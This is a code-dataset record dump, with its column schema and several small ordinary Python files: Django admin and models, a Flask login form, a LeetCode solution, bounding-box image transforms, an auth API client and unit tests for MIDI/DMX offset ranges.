hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
81c27ee4cdfe2a26ef7b4b636be36e22e9764ebe
221
py
Python
argostranslate/model.py
rushter/argos-translate
1a72c890bece98e8f3f506acf949b571d7d3bc7e
[ "MIT" ]
null
null
null
argostranslate/model.py
rushter/argos-translate
1a72c890bece98e8f3f506acf949b571d7d3bc7e
[ "MIT" ]
null
null
null
argostranslate/model.py
rushter/argos-translate
1a72c890bece98e8f3f506acf949b571d7d3bc7e
[ "MIT" ]
null
null
null
class LanguageModel: def infer(x): """Run language model on input x Args: x (str): Prompt to run inference on Returns: (str) Output of inference """ return prompt
20.090909
47
0.542986
26
221
4.615385
0.730769
0
0
0
0
0
0
0
0
0
0
0
0.380091
221
10
48
22.1
0.875912
0.506787
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
3
81e581ca8e25c5c732b7c9a6938959e1ce1dfd28
802
py
Python
pyano2/admin.py
mental689/pyano
2bc75e79618392f2013dfde2ac8035fe5fa1dc61
[ "MIT" ]
1
2022-01-31T17:34:37.000Z
2022-01-31T17:34:37.000Z
pyano2/admin.py
mental689/pyano
2bc75e79618392f2013dfde2ac8035fe5fa1dc61
[ "MIT" ]
null
null
null
pyano2/admin.py
mental689/pyano
2bc75e79618392f2013dfde2ac8035fe5fa1dc61
[ "MIT" ]
null
null
null
from django.contrib import admin from .models import * # Register your models here. admin.site.register(SystemSetting) admin.site.register(Topic) admin.site.register(Keyword) admin.site.register(SearchResult) admin.site.register(Invitation) admin.site.register(Alternative) admin.site.register(Credit) admin.site.register(VATICJobGroup) admin.site.register(VATICJob) admin.site.register(VATICVideo) admin.site.register(VATICSegment) admin.site.register(VATICLabel) admin.site.register(VATICAttribute) admin.site.register(AttributeAnnotation) admin.site.register(VATICPath) admin.site.register(VATICBox) admin.site.register(VATICBid) admin.site.register(VATICWorkerJob) admin.site.register(BannedVideo) admin.site.register(FreebaseTopic) admin.site.register(BlockedChannel) admin.site.register(Comment)
30.846154
40
0.840399
100
802
6.74
0.32
0.293769
0.554896
0
0
0
0
0
0
0
0
0
0.043641
802
26
41
30.846154
0.878748
0.032419
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.083333
0
0.083333
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
c4ad1b24aa893f34849a43e69fbd9ee2ed739b29
436
py
Python
coding_interviews/leetcode/medium/subrectangle_queries/subrectangle_queries.py
LeandroTk/Algorithms
569ed68eba3eeff902f8078992099c28ce4d7cd6
[ "MIT" ]
205
2018-12-01T17:49:49.000Z
2021-12-22T07:02:27.000Z
coding_interviews/leetcode/medium/subrectangle_queries/subrectangle_queries.py
LeandroTk/Algorithms
569ed68eba3eeff902f8078992099c28ce4d7cd6
[ "MIT" ]
2
2020-01-01T16:34:29.000Z
2020-04-26T19:11:13.000Z
coding_interviews/leetcode/medium/subrectangle_queries/subrectangle_queries.py
LeandroTk/Algorithms
569ed68eba3eeff902f8078992099c28ce4d7cd6
[ "MIT" ]
50
2018-11-28T20:51:36.000Z
2021-11-29T04:08:25.000Z
# https://leetcode.com/problems/subrectangle-queries class SubrectangleQueries: def __init__(self, rectangle): self.rectangle = rectangle def updateSubrectangle(self, row1, col1, row2, col2, newValue): for row in range(row1, row2 + 1): for col in range(col1, col2 + 1): self.rectangle[row][col] = newValue def getValue(self, row, col): return self.rectangle[row][col]
29.066667
67
0.639908
52
436
5.288462
0.5
0.189091
0.116364
0.138182
0
0
0
0
0
0
0
0.030488
0.247706
436
14
68
31.142857
0.807927
0.114679
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0
0.111111
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
c4b988e816739bae58b4243c6f71e763bf88bc25
224
py
Python
drdown/forum/views/view_base.py
fga-gpp-mds/2018.1-Cris-Down
3423374360105b06ac2c57a320bf2ee8deaa08a3
[ "MIT" ]
11
2018-03-11T01:21:43.000Z
2018-06-19T21:51:33.000Z
drdown/forum/views/view_base.py
fga-gpp-mds/2018.1-Grupo12
3423374360105b06ac2c57a320bf2ee8deaa08a3
[ "MIT" ]
245
2018-03-13T19:07:14.000Z
2018-07-07T22:46:00.000Z
drdown/forum/views/view_base.py
fga-gpp-mds/2018.1-Grupo12
3423374360105b06ac2c57a320bf2ee8deaa08a3
[ "MIT" ]
12
2018-08-24T13:26:04.000Z
2021-03-27T16:28:22.000Z
class BaseViewTemplate(): def get_template(self): if self.request.user.is_authenticated: template = "core/base.html" else: template = "core/base-nav.html" return template
24.888889
46
0.598214
24
224
5.5
0.708333
0.181818
0.242424
0
0
0
0
0
0
0
0
0
0.303571
224
8
47
28
0.846154
0
0
0
0
0
0.142857
0
0
0
0
0
0
1
0.142857
false
0
0
0
0.428571
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
c4c4554ca4d1294d115fc76632f5ae5d07210b8b
726
py
Python
setup.py
rkyoto/monotonic_cffi
8b2394ee65bcf16ab8d47f53db013ed39289a8d4
[ "Apache-2.0" ]
1
2016-05-03T06:51:10.000Z
2016-05-03T06:51:10.000Z
setup.py
rkyoto/monotonic_cffi
8b2394ee65bcf16ab8d47f53db013ed39289a8d4
[ "Apache-2.0" ]
null
null
null
setup.py
rkyoto/monotonic_cffi
8b2394ee65bcf16ab8d47f53db013ed39289a8d4
[ "Apache-2.0" ]
null
null
null
try: from setuptools import setup except ImportError: from distutils.core import setup setup( name='monotonic_cffi', version='0.1', license='Apache', author='Matt Jones', author_email='mattjones1811@hotmail.com', url='https://github.com/rkyoto/monotonic_cffi', classifiers=( 'Development Status :: 4 - Beta', 'License :: OSI Approved :: Apache Software License', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: Implementation :: CPython', 'Programming Language :: Python :: Implementation :: PyPy', ), py_modules=['monotonic_cffi'], install_requires=['cffi'], )
27.923077
70
0.636364
72
726
6.333333
0.666667
0.166667
0.219298
0.171053
0
0
0
0
0
0
0
0.016043
0.227273
726
25
71
29.04
0.796791
0
0
0
0
0
0.525517
0.034483
0
0
0
0
0
1
0
true
0
0.136364
0
0.136364
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
c4ccb59e89df8f337d320277046d41bb4256138b
423
py
Python
application/web/auth/forms.py
satan1a/poopak
9862f09edc22c030db520e317020b54a36e070ac
[ "curl" ]
91
2019-01-17T13:35:49.000Z
2022-03-30T21:16:37.000Z
application/web/auth/forms.py
satan1a/poopak
9862f09edc22c030db520e317020b54a36e070ac
[ "curl" ]
13
2019-01-13T14:35:51.000Z
2021-04-26T05:13:42.000Z
application/web/auth/forms.py
satan1a/poopak
9862f09edc22c030db520e317020b54a36e070ac
[ "curl" ]
33
2019-01-17T13:37:22.000Z
2022-03-25T09:35:54.000Z
from flask_wtf import FlaskForm from wtforms import StringField, PasswordField, SubmitField, validators from wtforms.validators import DataRequired class LoginForm(FlaskForm): username = StringField('Username', validators=[DataRequired()]) password = PasswordField('Password', validators=[DataRequired()]) captcha = StringField('captcha', validators=[validators.required()]) submit = SubmitField("Login")
38.454545
72
0.77305
39
423
8.358974
0.487179
0.067485
0
0
0
0
0
0
0
0
0
0
0.118203
423
11
73
38.454545
0.873995
0
0
0
0
0
0.066038
0
0
0
0
0
0
1
0
false
0.25
0.375
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
1
0
1
0
0
3
c4cf72ce24cd8395c7fc0f71e5b1d935992fdfe1
58
py
Python
workon/contrib/flow/__init__.py
dalou/django-workon
ef63c0a81c00ef560ed693e435cf3825f5170126
[ "BSD-3-Clause" ]
null
null
null
workon/contrib/flow/__init__.py
dalou/django-workon
ef63c0a81c00ef560ed693e435cf3825f5170126
[ "BSD-3-Clause" ]
null
null
null
workon/contrib/flow/__init__.py
dalou/django-workon
ef63c0a81c00ef560ed693e435cf3825f5170126
[ "BSD-3-Clause" ]
null
null
null
default_app_config = 'workon.contrib.flow.apps.FlowConfig'
58
58
0.844828
8
58
5.875
1
0
0
0
0
0
0
0
0
0
0
0
0.034483
58
1
58
58
0.839286
0
0
0
0
0
0.59322
0.59322
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
c4e8d4800d4855b456ea42b39c0cd6188cfeeeed
607
py
Python
tempestatibus/api/models.py
Damiox/tempestatibus-djangorest-reactjs
89f89d40101a39d5c554b279171b7a241601ed99
[ "MIT" ]
null
null
null
tempestatibus/api/models.py
Damiox/tempestatibus-djangorest-reactjs
89f89d40101a39d5c554b279171b7a241601ed99
[ "MIT" ]
3
2020-06-05T17:47:03.000Z
2021-06-10T19:53:59.000Z
tempestatibus/api/models.py
Damiox/tempestatibus-djangorest-reactjs
89f89d40101a39d5c554b279171b7a241601ed99
[ "MIT" ]
null
null
null
from django.db import models class Location(models.Model): city_name = models.CharField(max_length=100) population = models.IntegerField() class Subscription(models.Model): email = models.EmailField() location = models.ForeignKey(Location, on_delete=models.CASCADE) confirmation_id = models.UUIDField(null=True) confirmation_requested_at = models.DateTimeField(null=True) subscribed = models.BooleanField(default=False) subscribed_at = models.DateTimeField(null=True) updated_at = models.DateTimeField(null=True) unsubscribed_at = models.DateTimeField(null=True)
33.722222
68
0.766063
70
607
6.514286
0.528571
0.087719
0.184211
0.219298
0.254386
0
0
0
0
0
0
0.005725
0.136738
607
17
69
35.705882
0.864504
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.076923
0
1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
3
c4fdf9905acfa2f452d481de8842fe7010061a40
154
py
Python
Assets/Scripts/1.py
Kvazikot/Tunel
77eec06d4880f7f70dc2c7fe0afde9d287016cd3
[ "MIT" ]
null
null
null
Assets/Scripts/1.py
Kvazikot/Tunel
77eec06d4880f7f70dc2c7fe0afde9d287016cd3
[ "MIT" ]
null
null
null
Assets/Scripts/1.py
Kvazikot/Tunel
77eec06d4880f7f70dc2c7fe0afde9d287016cd3
[ "MIT" ]
null
null
null
There is two types of x. Classical x and quantum x. Quantum x is acting like a x. But if you ask quantum x a straight question, c can say "How dare you?"
30.8
56
0.74026
33
154
3.454545
0.69697
0.210526
0
0
0
0
0
0
0
0
0
0
0.214286
154
5
57
30.8
0.942149
0
0
0
0
0
0.083871
0
0
0
0
0
0
0
null
null
0
0
null
null
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
3
f2012b78254667f56614c0bb8b97e835ce91973f
632
py
Python
apps/merchant/unittests/test_factories.py
lsdlab/djshop_toturial
6d450225cc05e6a1ecd161de2b522e1af0b68cc0
[ "MIT" ]
null
null
null
apps/merchant/unittests/test_factories.py
lsdlab/djshop_toturial
6d450225cc05e6a1ecd161de2b522e1af0b68cc0
[ "MIT" ]
6
2020-06-07T15:18:58.000Z
2021-09-22T19:07:33.000Z
apps/merchant/unittests/test_factories.py
lsdlab/djshop_toturial
6d450225cc05e6a1ecd161de2b522e1af0b68cc0
[ "MIT" ]
null
null
null
from django.test import TestCase from django.forms.models import model_to_dict from nose.tools import eq_ from apps.merchant.unittests.factories import MerchantFactory from apps.merchant.serializers import MerchantSerializer class TestMerchantSerializer(TestCase): def setUp(self): self.data = model_to_dict(MerchantFactory.build()) def test_serializer_with_empty_data(self): serializer = MerchantSerializer(data={}) eq_(serializer.is_valid(), False) def test_serializer_with_valid_data(self): serializer = MerchantSerializer(data=self.data) eq_(serializer.is_valid(), True)
31.6
61
0.764241
76
632
6.131579
0.447368
0.051502
0.04721
0.090129
0.261803
0
0
0
0
0
0
0
0.155063
632
19
62
33.263158
0.872659
0
0
0
0
0
0
0
0
0
0
0
0
1
0.214286
false
0
0.357143
0
0.642857
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
0
1
0
0
3
f203bd6f70452ba13460619326e4163af498ac93
209
py
Python
exl_env/lib/python3.6/site-packages/imblearn/combine/__init__.py
verma-varsha/fraud-detection
13c5b0c274dfa2b68e82a4ee317e09223b5b663f
[ "MIT" ]
2
2019-09-14T23:23:35.000Z
2019-09-16T18:17:19.000Z
exl_env/lib/python3.6/site-packages/imblearn/combine/__init__.py
verma-varsha/fraud-detection
13c5b0c274dfa2b68e82a4ee317e09223b5b663f
[ "MIT" ]
null
null
null
exl_env/lib/python3.6/site-packages/imblearn/combine/__init__.py
verma-varsha/fraud-detection
13c5b0c274dfa2b68e82a4ee317e09223b5b663f
[ "MIT" ]
2
2019-04-02T18:03:29.000Z
2019-04-02T21:34:08.000Z
"""The :mod:`imblearn.combine` provides methods which combine over-sampling and under-sampling. """ from ._smote_enn import SMOTEENN from ._smote_tomek import SMOTETomek __all__ = ['SMOTEENN', 'SMOTETomek']
23.222222
61
0.770335
26
209
5.884615
0.730769
0.117647
0
0
0
0
0
0
0
0
0
0
0.114833
209
8
62
26.125
0.827027
0.440191
0
0
0
0
0.163636
0
0
0
0
0
0
1
0
false
0
0.666667
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
f210fd06fb8a3ebc717715780dfa9e1e53c2d3f2
3,792
py
Python
jactorch/transforms/bbox/transforms.py
dapatil211/Jacinle
7638a46dc06223a1871d88f92aade644883f40a0
[ "MIT" ]
114
2018-01-25T04:44:07.000Z
2022-03-09T14:33:42.000Z
third_party/Jacinle/jactorch/transforms/bbox/transforms.py
dair-iitd/1oML_workdir
37117de4abf1774548786e9534c90977d67091d8
[ "Apache-2.0" ]
7
2018-05-08T17:02:24.000Z
2022-02-09T23:44:06.000Z
third_party/Jacinle/jactorch/transforms/bbox/transforms.py
dair-iitd/1oML_workdir
37117de4abf1774548786e9534c90977d67091d8
[ "Apache-2.0" ]
268
2018-04-08T10:54:35.000Z
2022-03-01T07:10:02.000Z
#! /usr/bin/env python3 # -*- coding: utf-8 -*- # File : transforms.py # Author : Jiayuan Mao # Email : maojiayuan@gmail.com # Date : 03/03/2018 # # This file is part of Jacinle. # Distributed under terms of the MIT license. import random import torch import torchvision.transforms as transforms import jactorch.transforms.image as jac_transforms from . import functional as F __all__ = ["Compose", "Lambda", "ToTensor", "NormalizeBbox", "DenormalizeBbox", "Normalize", "Resize", "CenterCrop", "Pad", "RandomCrop", "RandomHorizontalFlip", "RandomVerticalFlip", "RandomResizedCrop", "LinearTransformation", "ColorJitter", "RandomRotation", "Grayscale", "RandomGrayscale", "PadMultipleOf"] class Compose(transforms.Compose): def __call__(self, img, bbox): for t in self.transforms: img, bbox = t(img, bbox) return img, bbox class Lambda(transforms.Lambda): def __call__(self, img, bbox): return self.lambd(img, bbox) class ToTensor(transforms.ToTensor): def __call__(self, img, bbox): # TODO(Jiayuan Mao @ 07/23): check whether bboxes are out of the image. return super().__call__(img), torch.from_numpy(bbox) class NormalizeBbox(object): def __call__(self, img, bbox): return F.normalize_bbox(img, bbox) class DenormalizeBbox(object): def __call__(self, img, bbox): return F.denormalize_bbox(img, bbox) class Normalize(transforms.Normalize): def __call__(self, img, bbox): return super().__call__(img), bbox class Resize(transforms.Resize): # Assuming bboxdinates are 0/1-normalized. 
def __call__(self, img, bbox): return super().__call__(img), bbox class CenterCrop(transforms.CenterCrop): def __call__(self, img, bbox): return F.center_crop(img, bbox, self.size) class Pad(transforms.Pad): def __call__(self, img, bbox): return F.pad(img, bbox, self.padding, self.fill) class RandomCrop(transforms.RandomCrop): def __call__(self, img, bbox): if self.padding > 0: img = F.pad(img, bbox, self.padding) i, j, h, w = self.get_params(img, self.size) return F.crop(img, bbox, i, j, h, w) class RandomHorizontalFlip(transforms.RandomHorizontalFlip): def __call__(self, img, bbox): if random.random() < 0.5: return F.hflip(img, bbox) return img, bbox class RandomVerticalFlip(transforms.RandomVerticalFlip): def __call__(self, img, bbox): if random.random() < 0.5: return F.vflip(img, bbox) return img, bbox class RandomResizedCrop(transforms.RandomResizedCrop): def __call__(self, img, bbox): i, j, h, w = self.get_params(img, self.scale, self.ratio) return F.resized_crop(img, bbox, i, j, h, w, self.size, self.interpolation) class Grayscale(transforms.Grayscale): def __call__(self, img, bbox): return super().__call__(img), bbox class RandomGrayscale(transforms.RandomGrayscale): def __call__(self, img, bbox): return super().__call__(img), bbox class LinearTransformation(transforms.LinearTransformation): def __call__(self, tensor, bbox): return super().__call__(tensor), bbox class ColorJitter(transforms.ColorJitter): def __call__(self, img, bbox): return super().__call__(img), bbox class RandomRotation(transforms.RandomRotation): def __call__(self, img, bbox): assert self.degrees[0] == self.degrees[1] == 0 angle = self.get_params(self.degrees) return F.rotate(img, bbox, angle, self.resample, self.expand, self.center) class PadMultipleOf(jac_transforms.PadMultipleOf): def __call__(self, img, coor): return F.pad_multiple_of(img, coor, self.multiple)
28.298507
123
0.674314
466
3,792
5.229614
0.253219
0.109151
0.085761
0.103406
0.3016
0.274928
0.208453
0.171112
0.145671
0.125975
0
0.00796
0.204905
3,792
133
124
28.511278
0.800332
0.085179
0
0.346154
0
0
0.064796
0
0
0
0
0.007519
0.012821
1
0.24359
false
0
0.064103
0.166667
0.820513
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
480dbef9c647a59a9f7d77e455eb6accc71a104e
2,622
py
Python
seed_services_client/auth.py
praekeltfoundation/seed-services-client
bfb216b6b770f9433bd9cda573f13199c4afee9c
[ "BSD-3-Clause" ]
null
null
null
seed_services_client/auth.py
praekeltfoundation/seed-services-client
bfb216b6b770f9433bd9cda573f13199c4afee9c
[ "BSD-3-Clause" ]
25
2016-06-24T14:37:51.000Z
2018-06-26T09:08:31.000Z
seed_services_client/auth.py
praekeltfoundation/seed-services-client
bfb216b6b770f9433bd9cda573f13199c4afee9c
[ "BSD-3-Clause" ]
null
null
null
from demands import JSONServiceClient, HTTPServiceClient class AuthApiClient(object): """ Client for Auth Service. :param str email: An email address. :param str password: A password. :param str api_url: The full URL of the API. """ def __init__(self, email, password, api_url, session=None, session_http=None): if session is None: session = JSONServiceClient(url=api_url) # login data = {"email": email, "password": password} login = session.post('/user/tokens/', data=data) self.token = login["token"] headers = {'Authorization': 'Token %s' % self.token} session = JSONServiceClient(url=api_url, headers=headers) self.session = session if session_http is None: session_http = HTTPServiceClient(url=api_url, headers=headers) self.session_http = session_http def get_permissions(self): return self.session.get('/user/') def get_users(self): return self.session.get('/users/') def create_user(self, user): return self.session.post('/users/', data=user) def get_user(self, user): return self.session.get('/users/%s/' % user) def update_user(self, user_id, user): return self.session.put('/users/%s/' % user_id, data=user) def remove_user_from_team(self, user, team): # Returns a 204 with empty content so lets return True if it worked response = self.session_http.delete('/teams/%s/users/%s/' % ( team, user,)) if response.status_code == 204: return True else: return False def add_user_to_team(self, user, team): # Returns a 204 with empty content so lets return True if it worked response = self.session_http.put('/teams/%s/users/%s/' % (team, user,)) if response.status_code == 204: return True else: return False def delete_user(self, user_id): # archives, soft delete response = self.session_http.delete('/users/%s/' % user_id) if response.status_code == 204: return True else: return False def get_teams(self): return self.session.get('/teams/') def create_team(self, org, team): return self.session.post('/organizations/%s/teams/' % org, data=team) def create_permission(self, team, 
permission): return self.session.post('/teams/%s/permissions/' % team, data=permission)
30.847059
79
0.593822
317
2,622
4.788644
0.236593
0.094203
0.089592
0.052701
0.447958
0.331357
0.293149
0.248353
0.248353
0.248353
0
0.008112
0.294813
2,622
84
80
31.214286
0.812872
0.120519
0
0.235294
0
0
0.085323
0.020336
0
0
0
0
0
1
0.235294
false
0.039216
0.019608
0.156863
0.54902
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
4823f4da829fca9d3d8e130f43e5372ae7a9fcf5
4,206
py
Python
test/bibliopixel/util/offset_range_test.py
rec/leds
ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a
[ "MIT" ]
253
2015-01-03T23:17:57.000Z
2021-12-14T02:31:08.000Z
test/bibliopixel/util/offset_range_test.py
rec/leds
ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a
[ "MIT" ]
879
2015-01-11T16:07:25.000Z
2021-12-10T16:24:31.000Z
test/bibliopixel/util/offset_range_test.py
rec/leds
ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a
[ "MIT" ]
71
2015-01-04T01:02:47.000Z
2022-03-25T18:30:10.000Z
import unittest from bibliopixel.util import offset_range class OffsetRangeTest(unittest.TestCase): def test_empty(self): dmx = offset_range.DMXChannel.make() self.assertEqual(dmx.index(0), None) self.assertEqual(dmx.index(1), 0) self.assertEqual(dmx.index(2), 1) self.assertEqual(dmx.index(511), 510) self.assertEqual(dmx.index(512), 511) self.assertEqual(dmx.index(513), None) l256 = list(range(256)) r = list(dmx.read_from(l256)) self.assertEqual(r, l256 + ([0] * 256)) target = [23] * 128 dmx.copy_to(l256, target) self.assertEqual(target, list(range(128))) def test_empty_copy(self): dmx = offset_range.DMXChannel.make() l256 = list(range(256)) r = list(dmx.read_from(l256)) self.assertEqual(r, l256 + ([0] * 256)) target = [] dmx.copy_to(l256, target) self.assertEqual(target, []) def test_positive_offset(self): midi = offset_range.MidiChannel(offset=4) self.assertEqual(midi.index(0), None) self.assertEqual(midi.index(1), None) self.assertEqual(midi.index(4), None) self.assertEqual(midi.index(5), 0) self.assertEqual(midi.index(6), 1) self.assertEqual(midi.index(15), 10) self.assertEqual(midi.index(16), 11) self.assertEqual(midi.index(16), 11) self.assertEqual(midi.index(17), None) expected = [-1, -1, -1, -1] + list(range(12)) actual = list(midi.read_from(range(16), pad=-1)) self.assertEqual(expected, actual) target = [100] * 100 midi.copy_to(list(range(16)), target) expected = list(range(4, 16)) + [100] * 88 self.assertEqual(target, expected) def test_negative_offset(self): midi = offset_range.MidiChannel(-4) self.assertEqual(midi.index(0), None) self.assertEqual(midi.index(1), 4) self.assertEqual(midi.index(2), 5) self.assertEqual(midi.index(12), 15) self.assertEqual(midi.index(13), None) actual = list(midi.read_from(range(16), pad=-1)) expected = list(range(4, 16)) + [-1, -1, -1, -1] self.assertEqual(expected, actual) target = [100] * 8 midi.copy_to(list(range(16)), target) expected = [4, 5, 6, 7, 8, 9, 10, 11] self.assertEqual(target, expected) def 
test_begin_end_offset(self): midi = offset_range.MidiChannel(offset=-5, begin=6, end=8) self.assertEqual(midi.index(0), None) self.assertEqual(midi.index(4), None) self.assertEqual(midi.index(5), None) self.assertEqual(midi.index(6), 10) self.assertEqual(midi.index(7), 11) self.assertEqual(midi.index(8), 12) self.assertEqual(midi.index(9), None) self.assertEqual(midi.index(10), None) actual = list(midi.read_from(range(16))) expected = [0, 0, 0, 0, 0, 10, 11, 12, 0, 0, 0, 0, 0, 0, 0, 0] self.assertEqual(expected, actual) target = [100] * 24 midi.copy_to(list(range(7)), target) expected = 5 * [100] + [5, 6] + 17 * [100] self.assertEqual(target, expected) target = [100] * 24 midi.copy_to(list(range(8)), target) expected = 5 * [100] + [5, 6, 7] + 16 * [100] self.assertEqual(target, expected) target = [100] * 24 midi.copy_to(list(range(9)), target) expected = 5 * [100] + [5, 6, 7] + 16 * [100] self.assertEqual(target, expected) def test_errors(self): with self.assertRaises(ValueError): offset_range.MidiChannel(begin=0) offset_range.MidiChannel(begin=1) offset_range.MidiChannel(begin=16) with self.assertRaises(ValueError): offset_range.MidiChannel(begin=17) with self.assertRaises(ValueError): offset_range.MidiChannel(end=0) offset_range.MidiChannel(end=1) offset_range.MidiChannel(end=16) with self.assertRaises(ValueError): offset_range.MidiChannel(end=17) with self.assertRaises(ValueError): offset_range.MidiChannel(begin=2, end=1)
33.380952
70
0.598431
542
4,206
4.573801
0.121771
0.242033
0.168616
0.212989
0.749092
0.659137
0.567164
0.498992
0.294877
0.268253
0
0.082266
0.257252
4,206
125
71
33.648
0.711268
0
0
0.402062
0
0
0
0
0
0
0
0
0.463918
1
0.061856
false
0
0.020619
0
0.092784
0
0
0
0
null
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
3
48387a159f561009e1c66d6458bea7cdd666812d
